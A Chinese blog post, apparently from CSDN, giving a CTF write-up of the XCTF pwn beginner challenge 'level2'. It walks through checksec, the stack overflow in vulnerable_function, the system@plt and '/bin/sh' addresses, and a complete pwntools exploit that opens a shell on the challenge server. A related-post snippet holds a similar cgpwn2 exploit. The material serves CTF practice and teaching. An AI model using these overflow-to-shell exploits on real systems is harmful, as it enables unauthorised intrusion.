pwn刷题num2---ret2syscall

已于 2022-04-22 20:48:10 修改
阅读量477 收藏
点赞数
分类专栏: CTF pwn 攻防世界 文章标签: 系统安全 安全 网络安全
于 2022-04-21 16:45:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124325089
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
攻防世界
17 篇文章 0 订阅
订阅专栏

攻防世界pwn新手区—level2

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

32位,小端序
开启部分RELRO---got表仍可写
未开启canary保护---存在栈溢出
开启NX保护----注入的shellcode不可执行
未开启PIE----程序地址为真实地址
动态链接

用ida查看一下
找到主函数

进入子函数vulnerable_function()

又是一个栈溢出(buf分配0x88字节大小空间,read函数读入0x100字节,可覆盖返回地址)
查看一下buf所在栈空间
在这里插入图片描述
在这里插入图片描述
buf距离返回地址(r)0x8c(0x88+0x4)字节
寻找后门函数发现主函数和子函数都存在system函数,但都不能获得shell,需要自己修改system函数的参数为/bin/sh
首先找到system的plt表地址0x8048320
在这里插入图片描述
再找到/bin/sh字符串地址0x804a024
在这里插入图片描述
编写exp

'''
栈溢出+system地址+字符串/bin/sh地址
'''
from pwn import *
context(endian = 'little',os = 'linux',arch = 'i386',log_level = 'debug')
sh = remote('111.200.241.244',57164)
system_addr = 0x8048320
bin_sh_addr= 0x0804A024
payload = flat(['a' * 0x88,'b' * 0x4,system_addr,'aaaa',bin_sh_addr])
sh.sendline(payload)
sh.interactive()

执行脚本获得shell
在这里插入图片描述

附上链接
x32和x64函数传参方式

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2syscall
EternalBurning的博客
11-10 463
ret2syscallchecksec查找溢出点计算偏移量1 手动计算2 脚本systemcall1 自动化脚本2 手动构造 checksec 查找溢出点 计算偏移量 1 手动计算 0x8048e8f和0x8048e93这两行明显是为调用函数准备参数,把参数的地址给压栈。这个地址就是gets函数写入地址的起始地址,也就是eax,此时距基址的距离是EBP-EAX,由于是32位,所以返回地址在E...
pwn刷题num5---ret2syscall
tbsqigongzi的博客
04-21 456
攻防世界pwn新手区cgpwn2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO—got表仍可写 未开启canary保护—存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 程序先让我们输入一个name,然后让我们输入一些信息,之后就结束了 直接ida 主函数就调用一个hello函数 发现危险函数gets()可以进行栈溢出,s距离返回地址0x2a(0x26+0x4)字节 之
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1155
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
pwn07.ret2syscall例题
11-11
ret2syscall例题
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN练习网站
GJQI12的专栏
04-10 2120
1.什么是PWF CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWNPWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被...
攻防世界:PWN刷题(一)
m0_53932372的博客
12-30 1591
cgpwn2 32bit,漏洞:栈溢出 这题很简单,第一次输入参数“/bin/sh”到一个bss区域,第二次利用栈溢出getshell exp: from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag
刷题学习网站
qq_40279081的博客
03-20 851
综合 1.菜鸟教程:菜鸟教程 - 学的不仅是技术,更是梦想! (runoob.com) 2.慕课:中国大学MOOC(慕课)_国家精品课程在线学习平台 (icourse163.org) 3.B站:哔哩哔哩 (゜-゜)つロ 干杯~-bilibili(不会有人没上过B站大学吧,不会吧,不会吧) 4.CSDN:CSDN - 专业开发者社区 5.GitHub:GitHub: Where the world builds software · GitHub(有时需要魔法) ACM 1.山东理工ACM主页
190706——【CTF】pwnpwnable.kr 刷题之 collision
DRondong的博客
07-06 614
此题为 pwnable.kr 中 toddler级别的第二题 涉及小端法存储,python -c,字符处理等知识 原题链接:https://pwnable.kr/play.php 题目描述: 依照昨天的套路,登上之后看可以文件,和昨天的第一题一模一样的套路: 直接看源码: #include <stdio.h> #include <string.h> unsigned ...
ret2syscall知识点及例题
weixin_44864859的博客
05-19 725
rop 检查程序防护和基本信息 注意到此时开启了NX防护,所以无法使IP寄存器指向堆,栈。另外,注意这是statically linked(静态链接) 调试分析后,知道与之前一样同样在112个字节后同样可以控制返回地址,那怎么获得shell呢? 我们要思考,让程序跳转到什么地方呢? 由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell,所以我们利用程序中的 gadgets 来获得 shell,而对应的 shell 获取则是利用系统调用。 简单地说,只要我们把对应获取 shell 的系
ROP链:ret2syscall
小龙在线
09-13 416
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值